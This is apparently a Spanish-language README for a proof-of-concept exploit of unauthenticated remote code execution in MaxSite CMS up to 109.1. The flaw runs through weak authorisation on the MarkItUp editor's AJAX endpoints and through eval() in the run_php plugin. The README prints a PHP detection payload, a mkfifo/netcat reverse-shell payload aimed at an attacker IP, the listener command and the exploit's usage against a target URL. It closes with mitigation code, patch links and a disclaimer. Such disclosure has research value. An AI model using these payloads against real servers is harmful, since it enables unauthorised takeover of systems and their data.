
Prueba de concepto de exploit para ejecución remota de código no autenticada en MaxSite CMS <= 109.1 a través de los endpoints AJAX del editor MarkItUp, con payloads de detección y shell inversa.
Vulnerabilidad de Ejecución Remota de Código (RCE) no autenticada en MaxSite CMS ≤ 109.1.
La falla surge de controles de autorización débiles en los endpoints AJAX del plugin del editor MarkItUp, combinados con la ejecución insegura de código PHP proporcionado por el usuario mediante el plugin run_php.
La vulnerabilidad afecta a los siguientes archivos del plugin del editor MarkItUp:
preview-ajax.phpautosave-post-ajax.phpEstos endpoints:
run_php[php]...[/php] usando eval()Un atacante puede enviar una solicitud POST manipulada a la ruta /ajax/ que contenga una ruta interna codificada en Base64 y un payload PHP malicioso a través del parámetro data, lo que resulta en:
graph TD
A["Attacker"] -->|"Malicious POST Request"| B["AJAX Endpoint"]
B -->|"Referer Spoofing"| C["preview-ajax.php"]
C -->|"Unsanitized Input"| D["run_php Plugin"]
D -->|"eval() Execution"| E["Arbitrary PHP Execution"]
E -->|"Command Execution"| F["Compromised Server"]
run_php habilitado (común por defecto)eval()Se incluye un exploit de prueba de concepto en Python 3 (exploit.py).
[php]echo 'RCE CONFIRMED - ' . phpversion();[/php]
[php]system('rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER_IP ATTACKER_PORT >/tmp/f');[/php]
nc -lvnp 9001
python3 exploit.py http://target.com --lhost 10.10.14.22 --lport 9001
run_php si no es necesarioAgregar comprobaciones de autenticación a los archivos vulnerables:
if (!is_login()) {
die('Access denied');
}
mso_checkreferer();
Commit del Parche https://github.com/maxsite/cms/commit/08937a3c5d672a242d68f53e9fccf8a748820ef3
Entrada de la Vulnerabilidad https://vuldb.com/?id.348281
Registro NVD https://nvd.nist.gov/vuln/detail/CVE-2026-3395
Este proyecto se proporciona para:
⚠️ No utilizar contra sistemas sin permiso explícito.
El autor no asume ninguna responsabilidad por el mal uso o los daños.
Mohammed Idrees Banyamer Jordania 🇯🇴 Investigador de Seguridad
banyamer_security — Silent Hunter • Shadow Presence
Marzo de 2026